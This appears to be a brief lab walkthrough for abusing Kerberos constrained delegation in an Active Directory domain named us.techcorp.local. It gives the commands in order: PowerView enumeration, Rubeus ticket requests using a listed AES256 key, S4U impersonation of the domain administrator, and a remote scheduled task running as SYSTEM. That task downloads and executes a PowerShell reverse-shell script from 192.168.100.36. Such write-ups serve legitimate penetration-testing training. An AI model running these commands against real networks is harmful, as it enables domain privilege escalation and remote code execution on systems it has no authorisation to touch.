Enumerating Constrained Delegation Using PowerView

Get-DomainUser -TrustedToAuth

We Read it this way: If I compromised the user appsvc I can access the CIFS Service on the us-mssql as any user including the Domain Admin

Now let’s go and open a session as appsvc user

.\\Rubeus.exe asktgt /user:appsvc /domain:us.techcorp.local /aes256:b4cb0430da8176ec6eae2002dfa86a8c6742e5a88448f1c2d6afc3781e114335 /ptt

Now let’s list the tickets to validate

klist

Now let’s abuse the Constrained Delegation

.\\Rubeus.exe s4u /user:appsvc /aes256:b4cb0430da8176ec6eae2002dfa86a8c6742e5a88448f1c2d6afc3781e114335 /impersonateuser:administrator /msdsspn:CIFS/us-mssql.us.techcorp.local /altservice:host /nowrap /ptt

Now let’s create a schedule task

schtasks /create /S us-mssql.us.techcorp.local /SC Weekly /RU "NT Authority\\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'IEX(iwr <http://192.168.100.36/Invoke-PowerShellTcp.ps1> -UseBasicParsing)'"

Now let’s run the scheduled Task

schtasks /Run /S us-mssql.us.techcorp.local /TN "STCheck"